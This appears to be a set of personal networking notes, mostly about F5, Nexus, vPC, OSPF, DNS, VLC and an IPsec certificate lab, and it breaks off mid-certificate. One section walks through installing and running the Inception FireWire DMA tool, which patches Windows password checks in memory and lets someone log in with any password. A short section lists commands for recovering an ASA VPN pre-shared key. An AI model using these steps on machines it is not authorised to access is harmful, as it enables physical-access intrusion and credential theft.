  set server_1 "2.2.2.1"
  set server_2 "2.2.2.2"

  if { [IP::client_addr] eq $client_1 } then {
    if { [LB::status pool $mypool member $server_1] eq "up" } then {
      pool $mypool member $server_1
    } else {
      # Fallback is unconditional: if server_2 is down as well the connection
      # is still sent there rather than to the pool at large.
      pool $mypool member $server_2
    }
  } elseif { [IP::client_addr] eq $client_2 } then {
    if { [LB::status pool $mypool member $server_2] eq "up" } then {
      pool $mypool member $server_2
    } else {
      # Same unconditional fallback as above.
      pool $mypool member $server_1
    }
  } else {
    # The two pinned clients above bypass persistence entirely, so their
    # member can flip whenever the status check changes; only other clients
    # are persisted here.
    persist uie "[IP::client_addr]"
    pool $mypool
  }
}


References

https://devcentral.f5.com/irules

# Nexus 5000 upgrade and downgrade procedure


Topology (Dual-Homed)

[N5k1]---PK---[N5k2]
[N5k1]---PL---[N5k2]
[N5k1]---vPC1---[N2k-fex101]
[N5k1]---vPC2---[N2k-fex102]
[N5k1]---vPC3---[N2k-fex103]
[N5k2]---vPC1---[N2k-fex101]
[N5k2]---vPC2---[N2k-fex102]
[N5k2]---vPC3---[N2k-fex103]


Determining the upgrade impact

If you are upgrading from NX-OS release 4.2.(1)N1(1) or later, you can perform an ISSU (In-Service Software Upgrade).
If the following checks pass, the upgrade can be non-disruptive (ISSU); otherwise it will be disruptive:
N5k# show incompatibility system bootflash:n5000.bin
N5k# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k# show spanning-tree issu-impact
N5k# show lacp issu-impact

Disruptive upgrade

1. Verify that the primary and secondary switches (N5k) have enough free space in bootflash to upload the kickstart and system images:
N5k1# dir bootflash:
N5k2# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the new kickstart and system images to each switch's bootflash.
4. Display the impact of the upgrade:
N5k1# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k2# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
5. Upgrade the primary switch:

N5k1# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
6. After the primary switch has been reloaded, change the boot variables on the secondary switch and save the configuration:

N5k2(config)# boot system bootflash:n5000.bin
N5k2(config)# boot kickstart bootflash:n5000-kickstart.bin
N5k2# copy running-configuration startup-configuration
7. Once done, reload each FEX from the secondary switch sequentially, one after the other:

N5k2# reload fex 101
N5k2# reload fex 102
N5k2# reload fex 103
8. Finally, reload the secondary switch without saving the current configuration:

N5k2# reload

Non-disruptive upgrade

1. Verify that the primary and secondary switches (N5k) have enough free space in bootflash to upload the kickstart and system images:
N5k1# dir bootflash:
N5k2# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the new kickstart and system images to each switch's bootflash.
4. Display the impact of the upgrade:
N5k1# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k2# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
5. Upgrade the primary switch:

N5k1# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin

6. After the primary switch has been reloaded, all FEX begin a rolling upgrade (automatic).
7. Once done, upgrade the secondary switch:

N5k2# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin

Downgrade

1. Verify that the switch (N5k) has enough free space in bootflash to upload the kickstart-old and system-old images:
N5k# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the kickstart-old and system-old images to the switch's bootflash.
4. Display the impact of the downgrade:
N5k# show install all impact kickstart bootflash:n5000-kickstart-old.bin system bootflash:n5000-old.bin
5. Downgrade the switch:

N5k# install all kickstart bootflash:n5000-kickstart-old.bin system bootflash:n5000-old.bin

Notes

- An ISSU is a non-disruptive upgrade: the control plane is reloaded, but the data plane keeps forwarding packets.
- The kickstart.bin file contains the kickstart image.
- The system.bin file contains the system image, the BIOS and the FEX images.

# vPC failure scenarios


Topology

[ N7K1 ]--- PK ---[ N7K2 ]
[ N7K1 ]--- PL ---[ N7K2 ]

[ N7K1 ]--- vPC ---[ N5K ]
[ N7K2 ]--- vPC ---[ N5K ]

Peer-Link goes down

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up ------> down (suspend)
- Role: secondary

Peer-Link is down and Peer-Keepalive goes down as well (dual active)

[ N7K1 ]

- Peer-Link down
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link down
- Peer-Keepalive up --> down
- vPC down ------> up (if auto-recovery enabled)
- Role: secondary ------> primary (if auto-recovery enabled)

Peer-Keepalive goes down

[ N7K1 ]

- Peer-Link up
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up
- Peer-Keepalive up --> down
- vPC up
- Role: secondary

Peer-Keepalive is down and Peer-Link goes down as well (dual-active)

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

Peer-Link and Peer-Keepalive go down at the same time (dual-active)

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

All tracked objects go down on primary

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up --> down
- Role: primary ------> secondary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up
- Role: secondary ------> primary

All tracked objects go down on primary and Peer-Keepalive goes down at the same time

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up --> down
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

Primary has power failure and is shut down

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

# VPN pre-shared key recovery


ASA# more system:running-config
ASA# copy running-config tftp
ASA# copy running-config ftp

# DNAME records


A CNAME (Canonical Name) record creates an alias between hostnames in the same domain or in different domains.
A DNAME (Delegation Name) record creates an alias between different domains.
For example:

NS1 is authoritative for the left.org domain:
left.org DNAME right.com

NS2 is authoritative for the right.com domain:
www.right.com A 1.1.1.1
*.right.com A 2.2.2.2

Every query for a name under left.org is answered with an alias to the same name under right.com (the DNAME applies to names below left.org, not to left.org itself):
C:\> nslookup

> www.left.org

Name:    www.right.com
Address:  1.1.1.1
Aliases:  www.left.org

> right.left.org

Name:    right.right.com
Address:  2.2.2.2
Aliases:  right.left.org

References

RFC 2672

# Bypass local authentication with Inception


Introduction

Inception

Configuration and installation

# cat /etc/modprobe.d/blacklist-firewire.conf
# Select the legacy firewire stack over the new CONFIG_FIREWIRE one.

blacklist ohci1394
blacklist sbp2
blacklist dv1394
blacklist raw1394
blacklist video1394

#blacklist firewire-ohci
#blacklist firewire-sbp2
# update-initramfs -k all -u
# reboot
# lsmod | grep -e firewire -e 1394
firewire_sbp2          15041  0 
firewire_net           13560  0 
ieee1394               94771  1 sbp2
firewire_ohci          24959  0 
firewire_core          51857  3 firewire_sbp2,firewire_net,firewire_ohci
crc_itu_t               1715  1 firewire_cor
# apt-get install git cmake python3 g++
# libforensic1394="http://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz"
# wget --no-check-certificate $libforensic1394
# tar xzvf libforensic1394-0.2.tar.gz
# cd libforensic1394-0.2
# cmake CMakeLists.txt
# make install
# cd python
# python3 setup.py install
# cd
# git clone https://github.com/carmaa/inception.git
# cd inception
# ./setup.py install
# cd

Bypassing Windows XP local authentication

This is a physical-access DMA attack: the FireWire link gives the attacking host read/write access to the target's RAM, which Inception uses to patch the password check in memory. On the defending side, disabling the FireWire (1394) controller or its SBP-2 driver on the target removes this vector.

1. Connect a firewire cable (4/4 or 4/6 pin) between your computer and the target.
2. Execute the tool:

# incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.2 (C) Carsten Maartmann-Moe 2012

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 4
[*] Selected target: Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] DMA shields should be down by now. Attacking...
[*] Searching,  334 MiB so far
[*] Signature found at 0x14eb7862 (in page # 85687)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

3. Log in to the target computer with an existing user name and any password. The patch is applied only to the running copy of msv1_0.dll in RAM, so it does not survive a reboot.

# Unicast streaming with VLC


Introduction

VideoLAN Streaming Howto

Send an audio stream to two unicast IP addresses
video_server# cvlc -vvv audio.mp3 --sout '#duplicate{
dst=rtp{mux=ts,dst=192.168.0.1,port=2001},
dst=rtp{mux=ts,dst=192.168.0.2,port=2002}
}'
client_1# cvlc -vvv rtp://@:2001
client_2# cvlc -vvv rtp://@:2002

Send an audio stream transcoded to MPEG, 16kbps, 8kHz and mono

video_server# cvlc -vvv audio.mp3 --sout '#transcode{
acodec=mpga,ab=16,channels=1,samplerate=8000
}:
duplicate{
dst=rtp{mux=ts,dst=192.168.0.1,port=2001},
dst=rtp{mux=ts,dst=192.168.0.2,port=2002}
}'

Bitrate calculation

bitrate = bits/second (bps)
samplerate = samples/seconds (Hz)
bit_resolution = bits/sample
channels = 1 (mono), 2 (stereo)

bitrate = samplerate * bit_resolution * channels

For example:

16kbps = 8kHz * 2b * 1

# OSPF

OSPF Router IDs

Before a router can send any OSPF messages, it needs a 32-bit dotted-decimal router identifier (RID).
Election:

- RID configured using router-id _id_ subcommand (best practice).
- Use the highest IP address on any loopback interface
- Use the highest IP address on any non-loopback interface.

Details:

- The RID does not need to be matched by an OSPF network command.
- The RID election occurs when the OSPF process is started or restarted.
- If a router's RID changes, the rest of the routers in the same area will perform a new SPF calculation (Dijkstra algorithm).

Becoming Neighbors, Exchanging Databases, and Becoming Adjacent

OSPF encapsulates the five types of OSPF messages inside IP packets (IP protocol 89):

- Hello: Used to discover and monitor neighbors.
- Database Description (DBD): To exchange brief versions of each LSA (data structure inside the LSDB). Typically on initial topology exchange.
- Link-State Request (LSR): To request full details about one or more LSAs.
- Link-State Update (LSU): Contains fully detailed information about one or more LSAs (in response to an LSR).
- Link-State Acknowledgement (LSAck): To confirm receipt of an LSU.

OSPF neighbor states:

- Down: no hellos received for more than the dead interval.
- Attempt: sending hellos to a manually configured neighbor.
- Init: a Hello was received but it does not list this router's RID. Neighbors stay in this state if parameters do not match.
- 2-way: a Hello was received that lists this router's RID. Permanent state between DRother neighbors.
- ExStart: DR election (if needed) and DBD sequence number negotiation.
- Exchange: DBD exchange.
- Loading: LSR, LSU and LSAck.
- Full: complete adjacency (identical LSDB) and routing table calculations begin.

Becoming Neighbors: The Hello Process

Hello messages major functions:

- Discover neighbors.
- Check parameters.
- Monitor health (heartbeat function).

OSPF routers listen for multicast Hello messages sent to 224.0.0.5.
To form a neighbor relationship, these parameters need to match:

- Authentication.
- Primary subnet and subnet mask.
- OSPF area.
- Area type (stub, NSSA, ...).
- Unique RIDs.
- OSPF Hello and Dead timers.
- MTU (must match for a successful DBD exchange).

The hello interval defaults to 10 seconds on LAN interfaces and 30 seconds on slower WAN interfaces.
The dead interval defaults to 4 times the hello interval.

Database Descriptor Exchange: Master/Slave Relationship

The router with the higher RID becomes the master and initiates the database exchange.
The slaves acknowledge each packet received.
Only the master can increment sequence numbers in the DBD exchange (LSA headers) process.

Requesting, Getting, and Acknowledging LSAs

The sequence number is used to tell which copy of an LSA is newer.
Each sequence number is incremented every time the LSA changes.
New LSAs begin with sequence number 0x80000001 (negative number) and increase to 0x7fffffff (positive number).
LSUs can be acknowledged by the receiver repeating the exact same LSU back to the sender or sending back an LSAck packet.

DR Election on LANs

At boot, after receiving a hello with a 0.0.0.0 DR field, all routers wait the OSPF wait time, which is set to the same value as the dead time, before attempting to elect a DR.
If a router receives a hello with a RID DR field, the router does not have to wait before beginning the election process.

To elect a DR, routers look first at the highest priority (1-255; 0 means the router never claims to be a DR candidate) and then at the highest RID.
If a received hello implies a better potential DR, the router stops claiming to want to be the DR. The second-best candidate, which does not claim to be the DR, becomes the BDR.
After the DR and BDR are elected there is no preemption, but if the DR fails, the BDR becomes the DR and a new BDR election occurs.

Designated Routers on WANs and OSPF Network Types

LAN interfaces default to use an OSPF network type of broadcast (elect a DR and dynamically find neighbors).
HDLC and PPP links use a network type of point-to-point (no DR is elected and neighbors found through hellos).
NBMA networks elect a DR/BDR and require manually configured neighbor commands.
Interface type can be set with ip ospf network _type_ interface subcommand.
OSPF network types:

- Broadcast: Uses DR/BDR, 10 secs Hello interval, does not require neighbor command, more than two routers allowed.
- Point-to-point: Does not use DR/BDR, 10 secs Hello interval, does not require neighbor command, two routers allowed.
- NBMA: Uses DR/BDR, 30 secs Hello interval, requires neighbor command, more than two routers allowed.
- Point-to-multipoint: Does not use DR/BDR, 30 seconds Hello interval, does not require neighbor command, more than two routers allowed.
- Point-to-multipoint nonbroadcast: Does not use DR/BDR, 30 seconds Hello interval, requires neighbor command, more than two routers allowed.

Caveats Regarding OSPF Network Types over NBMA Networks

- Check default Hello/Dead timers.
- Check all routers use the neighbor command.
- The DR and BDR must have a PVC (Permanent Virtual Circuit) to every other router in the subnet (DBD and LSU packets).

Two simple options for making OSPF work over Frame Relay, both which do not require a DR or a neighbor command:

- If the design allows the use of point-to-point subinterfaces, use those.
- If multipoint subinterfaces are needed, or if the configuration must not use subinterfaces, use ip ospf network point-to-multipoint.

Note: A router's neighbor priority setting is compared with the priority inside the Hello it receives from that neighbor. The larger of the two values is used.

Steady-State Operation

- Each router expects to receive Hellos from neighbors within the dead interval.
- Each router advertising an LSA refloods each LSA (after incrementing its sequence number by 1) based on the refresh interval (30 minutes by default).
- Each router expects to have its LSA refreshed within the maxage timer (60 minutes by default).

OSPF Design Terms

Using OSPF areas provides the following benefits:

- Smaller LSDB, requiring less memory.
- Faster SPF computation.
- A link failure in one area only requires a partial SPF computation in other areas.
- Routes may only be summarized at ABRs and ASBRs.

OSPF Path Selection Process

- OSPF always chooses an intra-area route over an inter-area route for the same prefix, regardless of metric.
- ABRs ignore Type 3 LSAs learned in a non-area-0 area, which prevents choosing a route that leaves area 0 into a nonbackbone area and then comes back into area 0.

LSA Types and Network Types

- LSA Type 1 (Router): One per router. Lists RID and all interface IP addresses.
- LSA Type 2 (Network): One per transit network. Created by the DR on the subnet. Represents the subnet and router interfaces connected to the subnet.
- LSA Type 3 (Net Summary): Created by the ABR. Defines the subnets in the origin area, cost, but no topology data.
- LSA Type 4 (ASBR Summary): Advertises a host route to reach the ASBR.
- LSA Type 5 (AS External): External routes injected into OSPF.
- LSA Type 6 (Group Membership): MOSPF.
- LSA Type 7 (NSSA External): Used in NSSA instead of a type 5 LSA.
- LSA Type 8 (External Attributes)
- LSA Type 9 (Opaque): Generic LSA used for OSPF extension.

A transit network is a network over which two or more OSPF routers have become neighbors.
A stub network is a network on which a router has not formed any neighbor relationships.

LSA Types 1 and 2

To signify a network that is down, the appropriate type 1 or 2 LSA is changed to show a metric of 16,777,215 (2^24 - 1).

LSA Type 3 and Inter-Area Costs

Each type 3 LSA describes a single vector (subnet, mask, and ABR's cost to reach the subnet).

LSA Types 4 and 5, and External Route Types 1 and 2

External type 1 adds the internal and external metrics together to compute the metric.
External type 2 only uses the external metric to compute the metric.
ASBRs inject external routes using type 5 LSA that reach all areas.
When ABRs flood the type 5 LSA into another area, the ABRs create a type 4 LSA, listing the ABR's metric to reach the ASBR that created the type 5 LSA. E1 routes are calculated by adding the cost to reach the ASBR and the cost listed in type 5 LSA.

Stubby Areas

- Stub: Stops type 5 LSAs, does not stop type 3 LSAs, does not create type 7 LSAs.
- Totally stubby: Stops type 5 LSAs, stops type 3 LSAs, does not create type 7 LSAs.
- NSSA: Stops type 5 LSAs, does not stop type 3 LSAs, creates type 7 LSAs.
- Totally NSSA: Stops type 5 LSAs, stops type 3 LSAs, creates type 7 LSAs.

- Stub: area _area-id_ stub
- Totally stubby: area _area-id_ stub no-summary
- NSSA: area _area-id_ nssa
- Totally NSSA: area _area-id_ nssa no-summary

Graceful Restart

Also known as nonstop forwarding (NSF), takes advantage of modern router architectures using separate routing and forwarding planes.
It is possible to continue forwarding without loops while routing process restarts, assuming:

- The router to restart must notify its neighbors sending a "grace LSA".
- The LSDB remains stable during the restart.
- All neighbors support, and are configured for, graceful restart.
- The restart takes place within a "grace period"

This feature is enabled by default and the following commands disable the cisco and IETF versions:
nsf cisco helper disable
nsf ietf helper disable

Choosing the Best Type of Path

Routers ignore the cost and choose the best route based on the following order of precedence:

- Intra-area routes
- Inter-area routes
- E1 routes
- E2 routes

Best-Path Side Effects of ABR Loop Prevention

OSPF applies split horizon so that an LSA advertised into a nonbackbone area is not advertised back into the backbone area.
ABRs ignore LSAs created by other ABRs, when learned through a nonbackbone area, when calculating least-cost paths.

OSPF Configuration

ip ospf dead-interval minimal hello-multiplier 4: 250 ms hello interval and 1 second dead interval.
ip ospf priority 255: Maximum priority value to become the DR.
router-id 1.1.1.1: RID manually configured, removing any reliance on an interface address.
The no-summary command option used in stub/nssa areas is only necessary in ABRs.
clear ip ospf process: All OSPF processes are cleared. DOWN -> INIT -> 2WAY -> EXSTART -> EXCHANGE -> LOADING -> FULL
The auto-cost reference-bandwidth 10000 command changes the reference bandwidth from 100 Mbps (cost = 10^8 / bandwidth) to 10,000 Mbps (cost = 10^10 / bandwidth).
The following list summarizes how IOS chooses OSPF interfaces costs:

- neighbor _RID_ cost _value_ OSPF command.
- ip ospf cost _value_ interface command.
- Default OSPF reference bandwidth.
- Changed OSPF reference bandwidth (auto-cost reference-bandwidth).

Alternatives to the OSPF Network Command

The network 10.3.0.0 0.0.255.255 area 3 OSPF command.
The ip ospf 1 area 3 interface command.
With the first one, OSPF advertises secondary subnets that are matched by the command as stub networks.
With the second one, OSPF advertises all subnets on the interface (primary and secondary as stub networks).

OSPF Filtering

There are three major types of OSPF filtering:

- Filtering routes, not LSAs.
- ABR type 3 LSA filtering.
- ABR using the area range no-advertise option.

Filtering Routes Using the distribute-list Command

With OSPF, the distribute-list command filters what ends up in the IP routing table and does not filter inbound LSAs.
Router(config)# ip prefix-list PREFIX_LIST seq 5 deny 10.1.1.0/24        
Router(config)# ip prefix-list PREFIX_LIST seq 10 permit 0.0.0.0/0 le 32
Router(config)# router ospf 1
Router(config-router)# distribute-list prefix PREFIX_LIST in fa0/0
Router(config)# access-list 2 permit 2.2.2.2
Router(config)# access-list 11 permit 10.1.1.0 0.0.0.255
Router(config)# route-map ROUTE_MAP deny 10
Router(config-route-map)# match ip address 11
Router(config-route-map)# match ip route-source 2
Router(config)# route-map ROUTE_MAP permit 20
Router(config)# router ospf 1
Router(config-router)# distribute-list route-map ROUTE_MAP in

OSPF ABR LSA Type 3 Filtering

The next command filters type 3 LSA going out of area 3:

Router(config)# ip prefix-list PREFIX_LIST seq 5 deny 10.3.2.0/23        
Router(config)# ip prefix-list PREFIX_LIST seq 10 permit 0.0.0.0/0 le 32
Router(config)# router ospf 1
Router(config-router)# area 3 filter-list prefix PREFIX_LIST out

The next command filters type 3 LSA going into area 0:

Router(config-router)# area 0 filter-list prefix PREFIX_LIST in

Filtering Type 3 LSAs with the area range Command

The next command filters type 3 LSA going out of area 3:

Router(config-router)# area 3 range 10.3.2.0 255.255.254.0 not-advertise

The area range command, without the not-advertise option, performs route summarization.

Virtual Link Configuration

OSPF requires that each nonbackbone area be connected to area 0.
OSPF also requires that each router within an area have a contiguous intra-area path to the other routers in the same area.
It is important when authenticating virtual links to remember that the virtual links themselves are in area 0.

Router1(config)# router ospf 1
Router1(config-router)# area 3 virtual-link 3.3.3.3
Router3(config)# router ospf 1
Router3(config-router)# area 3 virtual-link 1.1.1.1

Configuring OSPF Authentication

Basic rules:

- There are three types: type 0 (none), type 1 (clear text) and type 2 (MD5). Type 1 sends the key in the clear in every OSPF packet, so it only guards against accidental misconfiguration; for any protection against an attacker on the link use the MD5 keyed digest.
- Authentication is enabled using the following interface commands:
!Type 0
ip ospf authentication null
!Type 1
ip ospf authentication
ip ospf authentication-key SECRET_KEY
!Type 2
ip ospf authentication message-digest
ip ospf message-digest-key 1 md5 SECRET_KEY
- The default authentication is type 0.
- The default authentication can be redefined for all interfaces using the following commands under router ospf:
!Type 1
area _num_ authentication
!Type 2
area _num_ authentication message-digest
- Multiple keys are allowed per interface. OSPF sends multiple copies of each message (one for each key).
- Virtual links have no underlying interface so they are configured under router ospf:
!Type 0
area _num_ virtual-link _RID_ authentication null
!Type 1
area _num_ virtual-link _RID_ authentication authentication-key SECRET_KEY
!Type 2
area _num_ virtual-link _RID_ authentication message-digest message-digest-key 1 md5 SECRET_KEY
- The interface authentication takes precedence over router ospf authentication.

OSPF Stub Router Configuration

OSPF converges faster than BGP. Using the stub router feature on ASBRs the metrics are advertised with infinite cost for a configured time period or until BGP convergence is complete.
Under router ospf:

max-metric router-lsa on-startup _seconds_
max-metric router-lsa on-startup wait-for-bgp

OSPF Timer Summary

- MaxAge: The maximum time an LSA can be in the LSDB, without receiving a newer copy, before it is removed. Default is 3600 seconds.
- LSRefresh: Time interval per LSA to reflood an identical LSA. Prevents the expiration of MaxAge. Default is 1800 seconds.
- Hello: Default is 10 or 30 seconds.
- Dead: Time interval in which a Hello should be received from a neighbor. Default is 4 times the hello interval.
- Wait: Time a router will wait after reaching a 2WAY state for asserting a DR. Default is 4 times the hello interval.
- Retransmission: The time between sending an LSU, not receiving an ack, and resending the LSU. Default is 5 seconds.

# Site-to-site IPsec VPN with certificates


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Certificate signing request (CSR)

Note: this is a lab setup and several of the choices below should not be carried into production. revocation-check none disables CRL/OCSP checks, so a revoked peer certificate is still accepted; the export keyword on crypto key generate rsa makes the router's private key exportable, which IPsec does not need; and 1024-bit RSA keys together with the SHA-1 signatures the CA issues below are below current minimums (use 2048-bit or larger keys and SHA-256). Certificate validity is checked against the router clock, which is why clock set is the first command; in production synchronise the clock with NTP instead.

ROUTER-1# clock set 21:00:00 7 Oct 2012
ROUTER-1(config)# hostname router-1
router-1(config)# ip domain-name lab.net
router-1(config)# crypto pki trustpoint INCAWETRUST
router-1(ca-trustpoint)# enrollment terminal pem
router-1(ca-trustpoint)# fqdn router-1.lab.net
router-1(ca-trustpoint)# subject-name C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
router-1(ca-trustpoint)# revocation-check none
router-1(ca-trustpoint)# rsakeypair router-1.lab.net 1024
router-1(config)# crypto key zeroize rsa
router-1(config)# crypto key generate rsa general-keys label router-1.lab.net export modulus 1024
router-1(config)# crypto pki enroll INCAWETRUST
% Start certificate enrollment .. 

% The subject name in the certificate will include: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
% The subject name in the certificate will include: router-1.lab.net
% Include the router serial number in the subject name? [yes/no]: no
% Include an IP address in the subject name? [no]: no
Display Certificate Request to terminal? [yes/no]: yes
Certificate Request follows:

-----BEGIN CERTIFICATE REQUEST-----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-----END CERTIFICATE REQUEST-----

---End - This line not part of the certificate request---

Redisplay enrollment request? [yes/no]: no
ROUTER-2# clock set 21:02:00 7 Oct 2012
ROUTER-2(config)# hostname router-2
router-2(config)# ip domain-name lab.net
router-2(config)# crypto pki trustpoint INCAWETRUST
router-2(ca-trustpoint)# enrollment terminal pem
router-2(ca-trustpoint)# fqdn router-2.lab.net
router-2(ca-trustpoint)# subject-name C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net
router-2(ca-trustpoint)# revocation-check none
router-2(ca-trustpoint)# rsakeypair router-2.lab.net 1024
router-2(config)# crypto key generate rsa general-keys label router-2.lab.net export modulus 1024
router-2(config)# crypto pki enroll INCAWETRUST
% Start certificate enrollment .. 

% The subject name in the certificate will include: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net    
% The subject name in the certificate will include: router-2.lab.net
% Include the router serial number in the subject name? [yes/no]: no
% Include an IP address in the subject name? [no]: no
Display Certificate Request to terminal? [yes/no]: yes
Certificate Request follows:

-----BEGIN CERTIFICATE REQUEST-----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-----END CERTIFICATE REQUEST-----

---End - This line not part of the certificate request---

Redisplay enrollment request? [yes/no]: no

CA configuration

LINUX-CA# mkdir /etc/ssl/CA
LINUX-CA# mkdir /etc/ssl/newcerts
LINUX-CA# echo '01' > /etc/ssl/CA/serial
LINUX-CA# touch /etc/ssl/CA/index.txt
LINUX-CA# cat /etc/ssl/openssl.cnf
...
[ CA_default ]

dir             = /etc/ssl
database        = $dir/CA/index.txt
certificate     = $dir/certs/cacert.pem
serial          = $dir/CA/serial
private_key     = $dir/private/cakey.pem
...
string_mask = default
...

LINUX-CA# openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650
Generating a 1024 bit RSA private key
...................++++++
................++++++
writing new private key to 'cakey.pem'
Enter PEM pass phrase:MY_SECRET
Verifying - Enter PEM pass phrase:MY_SECRET
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:ES
State or Province Name (full name) [Some-State]:CAT
Locality Name (eg, city) []:BCN
Organization Name (eg, company) [Internet Widgits Pty Ltd]:CAnet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:canet.lab.net
Email Address []:root@lab.net

LINUX-CA# mv cakey.pem /etc/ssl/private/.
LINUX-CA# mv cacert.pem /etc/ssl/certs/.
LINUX-CA# cat /etc/ssl/certs/cacert.pem
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

Signing CSR

LINUX-CA# cat router-1.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTEubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMS5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDJGnpad++Ll/2DdGumYJWYnBxT2uWySlq
/5RBhpKigyDWg/1WEBfxc92ImdKuz438GXoLW+r6SXwJkeszvsFuKqKNfdt5zC8y
ZCcAQzWhM6RL36UQKhRZXq+kBGGhDyTIDBx8hgOEuC9SnK6ACapvPmR2Y738TBSx
La005oVIUwIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAeKhsFhdbcyX9CKEVxagQeF7bomWfc7YR04AMM0u1
t6iZJixHbADJQ1fa8LFjP/MbkRA2KwqHxtGN/D0uhyqE/vAfwslMV/Mm8l9c2iOC
HfzzV2bhQW9FpDcHyJSmmScINh1pZieczCiVAH+LGQVI2VkxY/CKEsqXUb2mQShZ
QlA=
-----END CERTIFICATE REQUEST-----
LINUX-CA# openssl ca -in router-1.csr -config /etc/ssl/openssl.cnf
Using configuration from /etc/ssl/openssl.cnf
Enter pass phrase for /etc/ssl/private/cakey.pem:MY_SECRET
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 1 (0x1)
        Validity
            Not Before: Oct  7 19:05:16 2012 GMT
            Not After : Oct  7 19:05:16 2013 GMT
        Subject:
            countryName               = ES
            stateOrProvinceName       = CAT
            organizationName          = CAnet
            organizationalUnitName    = Engineering
            commonName                = router-1.lab.net
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                81:DF:AB:0F:C0:6B:31:4B:08:5E:6D:86:11:26:9C:90:85:F5:83:8F
            X509v3 Authority Key Identifier: 
